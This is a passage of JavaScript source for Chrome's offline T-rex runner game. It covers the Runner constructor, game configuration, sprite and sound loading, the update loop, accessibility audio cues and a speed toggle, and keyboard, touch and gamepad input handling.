  Runner.instance_ = this;

  this.outerContainerEl = document.querySelector(outerContainerId);
  this.containerEl = null;
  this.snackbarEl = null;
  // A div to intercept touch events. Only set while (playing && useTouch).
  this.touchController = null;

  this.config = opt_config || Object.assign(Runner.config, Runner.normalConfig);
  // Logical dimensions of the container.
  this.dimensions = Runner.defaultDimensions;

  this.gameType = null;
  Runner.spriteDefinition = Runner.spriteDefinitionByType['original'];

  this.altGameImageSprite = null;
  this.altGameModeActive = false;
  this.altGameModeFlashTimer = null;
  this.fadeInTimer = 0;

  this.canvas = null;
  this.canvasCtx = null;

  this.tRex = null;

  this.distanceMeter = null;
  this.distanceRan = 0;

  this.highestScore = 0;
  this.syncHighestScore = false;

  this.time = 0;
  this.runningTime = 0;
  this.msPerFrame = 1000 / FPS;
  this.currentSpeed = this.config.SPEED;
  Runner.slowDown = false;

  this.obstacles = [];

  this.activated = false; // Whether the easter egg has been activated.
  this.playing = false; // Whether the game is currently in play state.
  this.crashed = false;
  this.paused = false;
  this.inverted = false;
  this.invertTimer = 0;
  this.resizeTimerId_ = null;

  this.playCount = 0;

  // Sound FX.
  this.audioBuffer = null;

  /** @type {Object} */
  this.soundFx = {};
  this.generatedSoundFx = null;

  // Global web audio context for playing sounds.
  this.audioContext = null;

  // Images.
  this.images = {};
  this.imagesLoaded = 0;

  // Gamepad state.
  this.pollingGamepads = false;
  this.gamepadIndex = undefined;
  this.previousGamepad = null;

  if (this.isDisabled()) {
    this.setupDisabledRunner();
  } else {
    if (Runner.isAltGameModeEnabled()) {
      this.initAltGameType();
      Runner.gameType = this.gameType;
    }
    this.loadImages();

    window['initializeEasterEggHighScore'] =
        this.initializeHighScore.bind(this);
  }
}

/**
 * Default game width.
 * @const
 */
const DEFAULT_WIDTH = 600;

/**
 * Frames per second.
 * @const
 */
const FPS = 60;

/** @const */
const IS_HIDPI = window.devicePixelRatio > 1;

/** @const */
const IS_IOS = /CriOS/.test(window.navigator.userAgent);

/** @const */
const IS_MOBILE = /Android/.test(window.navigator.userAgent) || IS_IOS;

/** @const */
const IS_RTL = document.querySelector('html').dir == 'rtl';

/** @const */
const ARCADE_MODE_URL = 'chrome://dino/';

/** @const */
const RESOURCE_POSTFIX = 'offline-resources-';

/** @const */
const A11Y_STRINGS = {
  ariaLabel: 'dinoGameA11yAriaLabel',
  description: 'dinoGameA11yDescription',
  gameOver: 'dinoGameA11yGameOver',
  highScore: 'dinoGameA11yHighScore',
  jump: 'dinoGameA11yJump',
  started: 'dinoGameA11yStartGame',
  speedLabel: 'dinoGameA11ySpeedToggle',
};

/**
 * Default game configuration.
 * Shared config for all  versions of the game. Additional parameters are
 * defined in Runner.normalConfig and Runner.slowConfig.
 */
Runner.config = {
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  // Scroll Y threshold at which the game can be activated.
  CANVAS_IN_VIEW_OFFSET: -10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  FADE_DURATION: 1,
  FLASH_DURATION: 1000,
  GAMEOVER_CLEAR_TIME: 1200,
  INITIAL_JUMP_VELOCITY: 12,
  INVERT_FADE_DURATION: 12000,
  MAX_BLINK_COUNT: 3,
  MAX_CLOUDS: 6,
  MAX_OBSTACLE_LENGTH: 3,
  MAX_OBSTACLE_DUPLICATION: 2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3,
  ARCADE_MODE_INITIAL_TOP_POSITION: 35,
  ARCADE_MODE_TOP_POSITION_PERCENT: 0.1,
};

Runner.normalConfig = {
  ACCELERATION: 0.001,
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  GAP_COEFFICIENT: 0.6,
  INVERT_DISTANCE: 700,
  MAX_SPEED: 13,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  SPEED: 6,
};


Runner.slowConfig = {
  ACCELERATION: 0.0005,
  AUDIOCUE_PROXIMITY_THRESHOLD: 170,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 220,
  GAP_COEFFICIENT: 0.3,
  INVERT_DISTANCE: 350,
  MAX_SPEED: 9,
  MOBILE_SPEED_COEFFICIENT: 1.5,
  SPEED: 4.2,
};


/**
 * Default dimensions.
 */
Runner.defaultDimensions = {
  WIDTH: DEFAULT_WIDTH,
  HEIGHT: 150,
};


/**
 * CSS class names.
 * @enum {string}
 */
Runner.classes = {
  ARCADE_MODE: 'arcade-mode',
  CANVAS: 'runner-canvas',
  CONTAINER: 'runner-container',
  CRASHED: 'crashed',
  ICON: 'icon-offline',
  INVERTED: 'inverted',
  SNACKBAR: 'snackbar',
  SNACKBAR_SHOW: 'snackbar-show',
  TOUCH_CONTROLLER: 'controller',
};


/**
 * Sound FX. Reference to the ID of the audio tag on interstitial page.
 * @enum {string}
 */
Runner.sounds = {
  BUTTON_PRESS: 'offline-sound-press',
  HIT: 'offline-sound-hit',
  SCORE: 'offline-sound-reached',
};


/**
 * Key code mapping.
 * @enum {Object}
 */
Runner.keycodes = {
  JUMP: {'38': 1, '32': 1},  // Up, spacebar
  DUCK: {'40': 1},           // Down
  RESTART: {'13': 1},        // Enter
};


/**
 * Runner event names.
 * @enum {string}
 */
Runner.events = {
  ANIM_END: 'webkitAnimationEnd',
  CLICK: 'click',
  KEYDOWN: 'keydown',
  KEYUP: 'keyup',
  POINTERDOWN: 'pointerdown',
  POINTERUP: 'pointerup',
  RESIZE: 'resize',
  TOUCHEND: 'touchend',
  TOUCHSTART: 'touchstart',
  VISIBILITY: 'visibilitychange',
  BLUR: 'blur',
  FOCUS: 'focus',
  LOAD: 'load',
  GAMEPADCONNECTED: 'gamepadconnected',
};

Runner.prototype = {
  /**
   * Initialize alternative game type.
   */
  initAltGameType() {
    if (GAME_TYPE.length > 0) {
      this.gameType = loadTimeData && loadTimeData.valueExists('altGameType') ?
          GAME_TYPE[parseInt(loadTimeData.getValue('altGameType'), 10) - 1] :
          '';
    }
  },

  /**
   * Whether the easter egg has been disabled. CrOS enterprise enrolled devices.
   * @return {boolean}
   */
  isDisabled() {
    return loadTimeData && loadTimeData.valueExists('disabledEasterEgg');
  },

  /**
   * For disabled instances, set up a snackbar with the disabled message.
   */
  setupDisabledRunner() {
    this.containerEl = document.createElement('div');
    this.containerEl.className = Runner.classes.SNACKBAR;
    this.containerEl.textContent = loadTimeData.getValue('disabledEasterEgg');
    this.outerContainerEl.appendChild(this.containerEl);

    // Show notification when the activation key is pressed.
    document.addEventListener(Runner.events.KEYDOWN, function(e) {
      if (Runner.keycodes.JUMP[e.keyCode]) {
        this.containerEl.classList.add(Runner.classes.SNACKBAR_SHOW);
        document.querySelector('.icon').classList.add('icon-disabled');
      }
    }.bind(this));
  },

  /**
   * Setting individual settings for debugging.
   * @param {string} setting
   * @param {number|string} value
   */
  updateConfigSetting(setting, value) {
    if (setting in this.config && value !== undefined) {
      this.config[setting] = value;

      switch (setting) {
        case 'GRAVITY':
        case 'MIN_JUMP_HEIGHT':
        case 'SPEED_DROP_COEFFICIENT':
          this.tRex.config[setting] = value;
          break;
        case 'INITIAL_JUMP_VELOCITY':
          this.tRex.setJumpVelocity(value);
          break;
        case 'SPEED':
          this.setSpeed(/** @type {number} */ (value));
          break;
      }
    }
  },

  /**
   * Creates an on page image element from the base 64 encoded string source.
   * @param {string} resourceName Name in data object,
   * @return {HTMLImageElement} The created element.
   */
  createImageElement(resourceName) {
    const imgSrc = loadTimeData && loadTimeData.valueExists(resourceName) ?
        loadTimeData.getString(resourceName) :
        null;

    if (imgSrc) {
      const el =
          /** @type {HTMLImageElement} */ (document.createElement('img'));
      el.id = resourceName;
      el.src = imgSrc;
      document.getElementById('offline-resources').appendChild(el);
      return el;
    }
    return null;
  },

  /**
   * Cache the appropriate image sprite from the page and get the sprite sheet
   * definition.
   */
  loadImages() {
    let scale = '1x';
    this.spriteDef = Runner.spriteDefinition.LDPI;
    if (IS_HIDPI) {
      scale = '2x';
      this.spriteDef = Runner.spriteDefinition.HDPI;
    }

    Runner.imageSprite = /** @type {HTMLImageElement} */
        (document.getElementById(RESOURCE_POSTFIX + scale));

    if (this.gameType) {
      Runner.altGameImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameSpecificImage' + scale));
      Runner.altCommonImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameCommonImage' + scale));
    }
    Runner.origImageSprite = Runner.imageSprite;

    // Disable the alt game mode if the sprites can't be loaded.
    if (!Runner.altGameImageSprite || !Runner.altCommonImageSprite) {
      Runner.isAltGameModeEnabled = () => false;
      this.altGameModeActive = false;
    }

    if (Runner.imageSprite.complete) {
      this.init();
    } else {
      // If the images are not yet loaded, add a listener.
      Runner.imageSprite.addEventListener(Runner.events.LOAD,
          this.init.bind(this));
    }
  },

  /**
   * Load and decode base 64 encoded sounds.
   */
  loadSounds() {
    if (!IS_IOS) {
      this.audioContext = new AudioContext();

      const resourceTemplate =
          document.getElementById(this.config.RESOURCE_TEMPLATE_ID).content;

      for (const sound in Runner.sounds) {
        let soundSrc =
            resourceTemplate.getElementById(Runner.sounds[sound]).src;
        soundSrc = soundSrc.substr(soundSrc.indexOf(',') + 1);
        const buffer = decodeBase64ToArrayBuffer(soundSrc);

        // Async, so no guarantee of order in array.
        this.audioContext.decodeAudioData(buffer, function(index, audioData) {
            this.soundFx[index] = audioData;
          }.bind(this, sound));
      }
    }
  },

  /**
   * Sets the game speed. Adjust the speed accordingly if on a smaller screen.
   * @param {number=} opt_speed
   */
  setSpeed(opt_speed) {
    const speed = opt_speed || this.currentSpeed;

    // Reduce the speed on smaller mobile screens.
    if (this.dimensions.WIDTH < DEFAULT_WIDTH) {
      const mobileSpeed = Runner.slowDown ? speed :
                                            speed * this.dimensions.WIDTH /
              DEFAULT_WIDTH * this.config.MOBILE_SPEED_COEFFICIENT;
      this.currentSpeed = mobileSpeed > speed ? speed : mobileSpeed;
    } else if (opt_speed) {
      this.currentSpeed = opt_speed;
    }
  },

  /**
   * Game initialiser.
   */
  init() {
    // Hide the static icon.
    document.querySelector('.' + Runner.classes.ICON).style.visibility =
        'hidden';

    this.adjustDimensions();
    this.setSpeed();

    const ariaLabel = getA11yString(A11Y_STRINGS.ariaLabel);
    this.containerEl = document.createElement('div');
    this.containerEl.setAttribute('role', IS_MOBILE ? 'button' : 'application');
    this.containerEl.setAttribute('tabindex', '0');
    this.containerEl.setAttribute('title', ariaLabel);

    this.containerEl.className = Runner.classes.CONTAINER;

    // Player canvas container.
    this.canvas = createCanvas(this.containerEl, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);

    // Live region for game status updates.
    this.a11yStatusEl = document.createElement('span');
    this.a11yStatusEl.className = 'offline-runner-live-region';
    this.a11yStatusEl.setAttribute('aria-live', 'assertive');
    this.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl = this.a11yStatusEl;

    // Add checkbox to slow down the game.
    this.slowSpeedCheckboxLabel = document.createElement('label');
    this.slowSpeedCheckboxLabel.className = 'slow-speed-option hidden';
    this.slowSpeedCheckboxLabel.textContent =
        getA11yString(A11Y_STRINGS.speedLabel);

    this.slowSpeedCheckbox = document.createElement('input');
    this.slowSpeedCheckbox.setAttribute('type', 'checkbox');
    this.slowSpeedCheckbox.setAttribute(
        'title', getA11yString(A11Y_STRINGS.speedLabel));
    this.slowSpeedCheckbox.setAttribute('tabindex', '0');
    this.slowSpeedCheckbox.setAttribute('checked', 'checked');

    this.slowSpeedToggleEl = document.createElement('span');
    this.slowSpeedToggleEl.className = 'slow-speed-toggle';

    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedCheckbox);
    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedToggleEl);

    if (IS_IOS) {
      this.outerContainerEl.appendChild(this.a11yStatusEl);
    } else {
      this.containerEl.appendChild(this.a11yStatusEl);
    }

    announcePhrase(getA11yString(A11Y_STRINGS.description));

    this.generatedSoundFx = new GeneratedSoundFx();

    this.canvasCtx =
        /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
    this.canvasCtx.fillStyle = '#f7f7f7';
    this.canvasCtx.fill();
    Runner.updateCanvasScaling(this.canvas);

    // Horizon contains clouds, obstacles and the ground.
    this.horizon = new Horizon(this.canvas, this.spriteDef, this.dimensions,
        this.config.GAP_COEFFICIENT);

    // Distance meter
    this.distanceMeter = new DistanceMeter(this.canvas,
          this.spriteDef.TEXT_SPRITE, this.dimensions.WIDTH);

    // Draw t-rex
    this.tRex = new Trex(this.canvas, this.spriteDef.TREX);

    this.outerContainerEl.appendChild(this.containerEl);
    this.outerContainerEl.appendChild(this.slowSpeedCheckboxLabel);

    this.startListening();
    this.update();

    window.addEventListener(Runner.events.RESIZE,
        this.debounceResize.bind(this));

    // Handle dark mode
    const darkModeMediaQuery =
        window.matchMedia('(prefers-color-scheme: dark)');
    this.isDarkMode = darkModeMediaQuery && darkModeMediaQuery.matches;
    darkModeMediaQuery.addListener((e) => {
      this.isDarkMode = e.matches;
    });
  },

  /**
   * Create the touch controller. A div that covers whole screen.
   */
  createTouchController() {
    this.touchController = document.createElement('div');
    this.touchController.className = Runner.classes.TOUCH_CONTROLLER;
    this.touchController.addEventListener(Runner.events.TOUCHSTART, this);
    this.touchController.addEventListener(Runner.events.TOUCHEND, this);
    this.outerContainerEl.appendChild(this.touchController);
  },

  /**
   * Debounce the resize event.
   */
  debounceResize() {
    if (!this.resizeTimerId_) {
      this.resizeTimerId_ =
          setInterval(this.adjustDimensions.bind(this), 250);
    }
  },

  /**
   * Adjust game space dimensions on resize.
   */
  adjustDimensions() {
    clearInterval(this.resizeTimerId_);
    this.resizeTimerId_ = null;

    const boxStyles = window.getComputedStyle(this.outerContainerEl);
    const padding = Number(boxStyles.paddingLeft.substr(0,
        boxStyles.paddingLeft.length - 2));

    this.dimensions.WIDTH = this.outerContainerEl.offsetWidth - padding * 2;
    if (this.isArcadeMode()) {
      this.dimensions.WIDTH = Math.min(DEFAULT_WIDTH, this.dimensions.WIDTH);
      if (this.activated) {
        this.setArcadeModeContainerScale();
      }
    }

    // Redraw the elements back onto the canvas.
    if (this.canvas) {
      this.canvas.width = this.dimensions.WIDTH;
      this.canvas.height = this.dimensions.HEIGHT;

      Runner.updateCanvasScaling(this.canvas);

      this.distanceMeter.calcXPos(this.dimensions.WIDTH);
      this.clearCanvas();
      this.horizon.update(0, 0, true);
      this.tRex.update(0);

      // Outer container and distance meter.
      if (this.playing || this.crashed || this.paused) {
        this.containerEl.style.width = this.dimensions.WIDTH + 'px';
        this.containerEl.style.height = this.dimensions.HEIGHT + 'px';
        this.distanceMeter.update(0, Math.ceil(this.distanceRan));
        this.stop();
      } else {
        this.tRex.draw(0, 0);
      }

      // Game over panel.
      if (this.crashed && this.gameOverPanel) {
        this.gameOverPanel.updateDimensions(this.dimensions.WIDTH);
        this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
      }
    }
  },

  /**
   * Play the game intro.
   * Canvas container width expands out to the full width.
   */
  playIntro() {
    if (!this.activated && !this.crashed) {
      this.playingIntro = true;
      this.tRex.playingIntro = true;

      // CSS animation definition.
      const keyframes = '@-webkit-keyframes intro { ' +
            'from { width:' + Trex.config.WIDTH + 'px }' +
            'to { width: ' + this.dimensions.WIDTH + 'px }' +
          '}';
      document.styleSheets[0].insertRule(keyframes, 0);

      this.containerEl.addEventListener(Runner.events.ANIM_END,
          this.startGame.bind(this));

      this.containerEl.style.webkitAnimation = 'intro .4s ease-out 1 both';
      this.containerEl.style.width = this.dimensions.WIDTH + 'px';

      this.setPlayStatus(true);
      this.activated = true;
    } else if (this.crashed) {
      this.restart();
    }
  },


  /**
   * Update the game status to started.
   */
  startGame() {
    if (this.isArcadeMode()) {
      this.setArcadeMode();
    }
    this.toggleSpeed();
    this.runningTime = 0;
    this.playingIntro = false;
    this.tRex.playingIntro = false;
    this.containerEl.style.webkitAnimation = '';
    this.playCount++;
    this.generatedSoundFx.background();
    announcePhrase(getA11yString(A11Y_STRINGS.started));

    if (Runner.audioCues) {
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
    }

    // Handle tabbing off the page. Pause the current game.
    document.addEventListener(Runner.events.VISIBILITY,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.BLUR,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.FOCUS,
          this.onVisibilityChange.bind(this));
  },

  clearCanvas() {
    this.canvasCtx.clearRect(0, 0, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);
  },

  /**
   * Checks whether the canvas area is in the viewport of the browser
   * through the current scroll position.
   * @return boolean.
   */
  isCanvasInView() {
    return this.containerEl.getBoundingClientRect().top >
        Runner.config.CANVAS_IN_VIEW_OFFSET;
  },

  /**
   * Enable the alt game mode. Switching out the sprites.
   */
  enableAltGameMode() {
    Runner.imageSprite = Runner.altGameImageSprite;
    Runner.spriteDefinition = Runner.spriteDefinitionByType[Runner.gameType];

    if (IS_HIDPI) {
      this.spriteDef = Runner.spriteDefinition.HDPI;
    } else {
      this.spriteDef = Runner.spriteDefinition.LDPI;
    }

    this.altGameModeActive = true;
    this.tRex.enableAltGameMode(this.spriteDef.TREX);
    this.horizon.enableAltGameMode(this.spriteDef);
    this.generatedSoundFx.background();
  },

  /**
   * Update the game frame and schedules the next one.
   */
  update() {
    this.updatePending = false;

    const now = getTimeStamp();
    let deltaTime = now - (this.time || now);

    // Flashing when switching game modes.
    if (this.altGameModeFlashTimer < 0 || this.altGameModeFlashTimer === 0) {
      this.altGameModeFlashTimer = null;
      this.tRex.setFlashing(false);
      this.enableAltGameMode();
    } else if (this.altGameModeFlashTimer > 0) {
      this.altGameModeFlashTimer -= deltaTime;
      this.tRex.update(deltaTime);
      deltaTime = 0;
    }

    this.time = now;

    if (this.playing) {
      this.clearCanvas();

      // Additional fade in - Prevents jump when switching sprites
      if (this.altGameModeActive &&
          this.fadeInTimer <= this.config.FADE_DURATION) {
        this.fadeInTimer += deltaTime / 1000;
        this.canvasCtx.globalAlpha = this.fadeInTimer;
      } else {
        this.canvasCtx.globalAlpha = 1;
      }

      if (this.tRex.jumping) {
        this.tRex.updateJump(deltaTime);
      }

      this.runningTime += deltaTime;
      const hasObstacles = this.runningTime > this.config.CLEAR_TIME;

      // First jump triggers the intro.
      if (this.tRex.jumpCount === 1 && !this.playingIntro) {
        this.playIntro();
      }

      // The horizon doesn't move until the intro is over.
      if (this.playingIntro) {
        this.horizon.update(0, this.currentSpeed, hasObstacles);
      } else if (!this.crashed) {
        const showNightMode = this.isDarkMode ^ this.inverted;
        deltaTime = !this.activated ? 0 : deltaTime;
        this.horizon.update(
            deltaTime, this.currentSpeed, hasObstacles, showNightMode);
      }

      // Check for collisions.
      let collision = hasObstacles &&
          checkForCollision(this.horizon.obstacles[0], this.tRex);

      // For a11y, audio cues.
      if (Runner.audioCues && hasObstacles) {
        const jumpObstacle =
            this.horizon.obstacles[0].typeConfig.type != 'COLLECTABLE';

        if (!this.horizon.obstacles[0].jumpAlerted) {
          const threshold = Runner.isMobileMouseInput ?
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y :
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD;
          const adjProximityThreshold = threshold +
              (threshold * Math.log10(this.currentSpeed / Runner.config.SPEED));

          if (this.horizon.obstacles[0].xPos < adjProximityThreshold) {
            if (jumpObstacle) {
              this.generatedSoundFx.jump();
            }
            this.horizon.obstacles[0].jumpAlerted = true;
          }
        }
      }

      // Activated alt game mode.
      if (Runner.isAltGameModeEnabled() && collision &&
          this.horizon.obstacles[0].typeConfig.type == 'COLLECTABLE') {
        this.horizon.removeFirstObstacle();
        this.tRex.setFlashing(true);
        collision = false;
        this.altGameModeFlashTimer = this.config.FLASH_DURATION;
        this.runningTime = 0;
        this.generatedSoundFx.collect();
      }

      if (!collision) {
        this.distanceRan += this.currentSpeed * deltaTime / this.msPerFrame;

        if (this.currentSpeed < this.config.MAX_SPEED) {
          this.currentSpeed += this.config.ACCELERATION;
        }
      } else {
        this.gameOver();
      }

      const playAchievementSound = this.distanceMeter.update(deltaTime,
          Math.ceil(this.distanceRan));

      if (!Runner.audioCues && playAchievementSound) {
        this.playSound(this.soundFx.SCORE);
      }

      // Night mode.
      if (!Runner.isAltGameModeEnabled()) {
        if (this.invertTimer > this.config.INVERT_FADE_DURATION) {
          this.invertTimer = 0;
          this.invertTrigger = false;
          this.invert(false);
        } else if (this.invertTimer) {
          this.invertTimer += deltaTime;
        } else {
          const actualDistance =
              this.distanceMeter.getActualDistance(Math.ceil(this.distanceRan));

          if (actualDistance > 0) {
            this.invertTrigger =
                !(actualDistance % this.config.INVERT_DISTANCE);

            if (this.invertTrigger && this.invertTimer === 0) {
              this.invertTimer += deltaTime;
              this.invert(false);
            }
          }
        }
      }
    }

    if (this.playing || (!this.activated &&
        this.tRex.blinkCount < Runner.config.MAX_BLINK_COUNT)) {
      this.tRex.update(deltaTime);
      this.scheduleNextUpdate();
    }
  },

  /**
   * Event handler.
   * @param {Event} e
   */
  handleEvent(e) {
    return (function(evtType, events) {
      switch (evtType) {
        case events.KEYDOWN:
        case events.TOUCHSTART:
        case events.POINTERDOWN:
          this.onKeyDown(e);
          break;
        case events.KEYUP:
        case events.TOUCHEND:
        case events.POINTERUP:
          this.onKeyUp(e);
          break;
        case events.GAMEPADCONNECTED:
          this.onGamepadConnected(e);
          break;
      }
    }.bind(this))(e.type, Runner.events);
  },

  /**
   * Initialize audio cues if activated by focus on the canvas element.
   * @param {Event} e
   */
  handleCanvasKeyPress(e) {
    if (!this.activated && !Runner.audioCues) {
      this.toggleSpeed();
      Runner.audioCues = true;
      this.generatedSoundFx.init();
      Runner.generatedSoundFx = this.generatedSoundFx;
      Runner.config.CLEAR_TIME *= 1.2;
    } else if (e.keyCode && Runner.keycodes.JUMP[e.keyCode]) {
      this.onKeyDown(e);
    }
  },

  /**
   * Prevent space key press from scrolling.
   * @param {Event} e
   */
  preventScrolling(e) {
    if (e.keyCode === 32) {
      e.preventDefault();
    }
  },

  /**
   * Toggle speed setting if toggle is shown.
   */
  toggleSpeed() {
    if (Runner.audioCues) {
      const speedChange = Runner.slowDown != this.slowSpeedCheckbox.checked;

      if (speedChange) {
        Runner.slowDown = this.slowSpeedCheckbox.checked;
        const updatedConfig =
            Runner.slowDown ? Runner.slowConfig : Runner.normalConfig;

        Runner.config = Object.assign(Runner.config, updatedConfig);
        this.currentSpeed = updatedConfig.SPEED;
        this.tRex.enableSlowConfig();
        this.horizon.adjustObstacleSpeed();
      }
      if (this.playing) {
        this.disableSpeedToggle(true);
      }
    }
  },

  /**
   * Show the speed toggle.
   * From focus event or when audio cues are activated.
   * @param {Event=} e
   */
  showSpeedToggle(e) {
    const isFocusEvent = e && e.type == 'focus';
    if (Runner.audioCues || isFocusEvent) {
      this.slowSpeedCheckboxLabel.classList.toggle(
          HIDDEN_CLASS, isFocusEvent ? false : !this.crashed);
    }
  },

  /**
   * Disable the speed toggle.
   * @param {boolean} disable
   */
  disableSpeedToggle(disable) {
    if (disable) {
      this.slowSpeedCheckbox.setAttribute('disabled', 'disabled');
    } else {
      this.slowSpeedCheckbox.removeAttribute('disabled');
    }
  },

  /**
   * Bind relevant key / mouse / touch listeners.
   */
  startListening() {
    // A11y keyboard / screen reader activation.
    this.containerEl.addEventListener(
        Runner.events.KEYDOWN, this.handleCanvasKeyPress.bind(this));
    if (!IS_MOBILE) {
      this.containerEl.addEventListener(
          Runner.events.FOCUS, this.showSpeedToggle.bind(this));
    }
    this.canvas.addEventListener(
        Runner.events.KEYDOWN, this.preventScrolling.bind(this));
    this.canvas.addEventListener(
        Runner.events.KEYUP, this.preventScrolling.bind(this));

    // Keys.
    document.addEventListener(Runner.events.KEYDOWN, this);
    document.addEventListener(Runner.events.KEYUP, this);

    // Touch / pointer.
    this.containerEl.addEventListener(Runner.events.TOUCHSTART, this);
    document.addEventListener(Runner.events.POINTERDOWN, this);
    document.addEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      // Gamepad
      window.addEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Remove all listeners.
   */
  stopListening() {
    document.removeEventListener(Runner.events.KEYDOWN, this);
    document.removeEventListener(Runner.events.KEYUP, this);

    if (this.touchController) {
      this.touchController.removeEventListener(Runner.events.TOUCHSTART, this);
      this.touchController.removeEventListener(Runner.events.TOUCHEND, this);
    }

    this.containerEl.removeEventListener(Runner.events.TOUCHSTART, this);
    document.removeEventListener(Runner.events.POINTERDOWN, this);
    document.removeEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      window.removeEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Process keydown.
   * @param {Event} e
   */
  onKeyDown(e) {
    // Prevent native page scrolling whilst tapping on mobile.
    if (IS_MOBILE && this.playing) {
      e.preventDefault();
    }

    if (this.isCanvasInView()) {
      // Allow toggling of speed toggle.
      if (Runner.keycodes.JUMP[e.keyCode] &&
          e.target == this.slowSpeedCheckbox) {
        return;
      }

      if (!this.crashed && !this.paused) {
        // For a11y, screen reader activation.
        const isMobileMouseInput = IS_MOBILE &&
                e.type === Runner.events.POINTERDOWN &&
                e.pointerType == 'mouse' && e.target == this.containerEl ||
            (IS_IOS && e.pointerType == 'touch' &&
             document.activeElement == this.containerEl);

        if (Runner.keycodes.JUMP[e.keyCode] ||
            e.type === Runner.events.TOUCHSTART || isMobileMouseInput ||
            (Runner.keycodes.DUCK[e.keyCode] && this.altGameModeActive)) {
          e.preventDefault();
          // Starting the game for the first time.
          if (!this.playing) {
            // Started by touch so create a touch controller.
            if (!this.touchController && e.type === Runner.events.TOUCHSTART) {
              this.createTouchController();
            }

            if (isMobileMouseInput) {
              this.handleCanvasKeyPress(e);
            }
            this.loadSounds();
            this.setPlayStatus(true);
            this.update();
            if (window.errorPageController) {
              errorPageController.trackEasterEgg();
            }
          }
          // Start jump.
          if (!this.tRex.jumping && !this.tRex.ducking) {
            if (Runner.audioCues) {
              this.generatedSoundFx.cancelFootSteps();
            } else {
              this.playSound(this.soundFx.BUTTON_PRESS);
            }
            this.tRex.startJump(this.currentSpeed);
          }
          // Ducking is disabled on alt game modes.
        } else if (
            !this.altGameModeActive && this.playing &&
            Runner.keycodes.DUCK[e.keyCode]) {
          e.preventDefault();
          if (this.tRex.jumping) {
            // Speed drop, activated only when jump key is not pressed.
            this.tRex.setSpeedDrop();
          } else if (!this.tRex.jumping && !this.tRex.ducking) {
            // Duck.
            this.tRex.setDuck(true);
          }
        }
      }
    }
  },

  /**
   * Process key up.
   * @param {Event} e
   */
  onKeyUp(e) {
    const keyCode = String(e.keyCode);
    const isjumpKey = Runner.keycodes.JUMP[keyCode] ||
        e.type === Runner.events.TOUCHEND || e.type === Runner.events.POINTERUP;

    if (this.isRunning() && isjumpKey) {
      this.tRex.endJump();
    } else if (Runner.keycodes.DUCK[keyCode]) {
      this.tRex.speedDrop = false;
      this.tRex.setDuck(false);
    } else if (this.crashed) {
      // Check that enough time has elapsed before allowing jump key to restart.
      const deltaTime = getTimeStamp() - this.time;

      if (this.isCanvasInView() &&
          (Runner.keycodes.RESTART[keyCode] || this.isLeftClickOnCanvas(e) ||
          (deltaTime >= this.config.GAMEOVER_CLEAR_TIME &&
          Runner.keycodes.JUMP[keyCode]))) {
        this.handleGameOverClicks(e);
      }
    } else if (this.paused && isjumpKey) {
      // Reset the jump state
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Process gamepad connected event.
   * @param {Event} e
   */
  onGamepadConnected(e) {
    if (!this.pollingGamepads) {
      this.pollGamepadState();
    }
  },

  /**
   * rAF loop for gamepad polling.
   */
  pollGamepadState() {
    const gamepads = navigator.getGamepads();
    this.pollActiveGamepad(gamepads);

    this.pollingGamepads = true;
    requestAnimationFrame(this.pollGamepadState.bind(this));
  },

  /**
   * Polls for a gamepad with the jump button pressed. If one is found this
   * becomes the "active" gamepad and all others are ignored.
   * @param {!Array<Gamepad>} gamepads
   */
  pollForActiveGamepad(gamepads) {
    for (let i = 0; i < gamepads.length; ++i) {
      if (gamepads[i] && gamepads[i].buttons.length > 0 &&
          gamepads[i].buttons[0].pressed) {
        this.gamepadIndex = i;
        this.pollActiveGamepad(gamepads);
        return;
      }
    }
  },

  /**
   * Polls the chosen gamepad for button presses and generates KeyboardEvents
   * to integrate with the rest of the game logic.
   * @param {!Array<Gamepad>} gamepads
   */
  pollActiveGamepad(gamepads) {
    if (this.gamepadIndex === undefined) {
      this.pollForActiveGamepad(gamepads);
      return;
    }

    const gamepad = gamepads[this.gamepadIndex];
    if (!gamepad) {
      this.gamepadIndex = undefined;
      this.pollForActiveGamepad(gamepads);
      return;
    }

    // The gamepad specification defines the typical mapping of physical buttons
    // to button indicies: https://w3c.github.io/gamepad/#remapping
    this.pollGamepadButton(gamepad, 0, 38);  // Jump
    if (gamepad.buttons.length >= 2) {
      this.pollGamepadButton(gamepad, 1, 40);  // Duck
    }
    if (gamepad.buttons.length >= 10) {
      this.pollGamepadButton(gamepad, 9, 13);  // Restart
    }

    this.previousGamepad = gamepad;
  },

  /**
   * Generates a key event based on a gamepad button.
   * @param {!Gamepad} gamepad
   * @param {number} buttonIndex
   * @param {number} keyCode
   */
  pollGamepadButton(gamepad, buttonIndex, keyCode) {
    const state = gamepad.buttons[buttonIndex].pressed;
    let previousState = false;
    if (this.previousGamepad) {
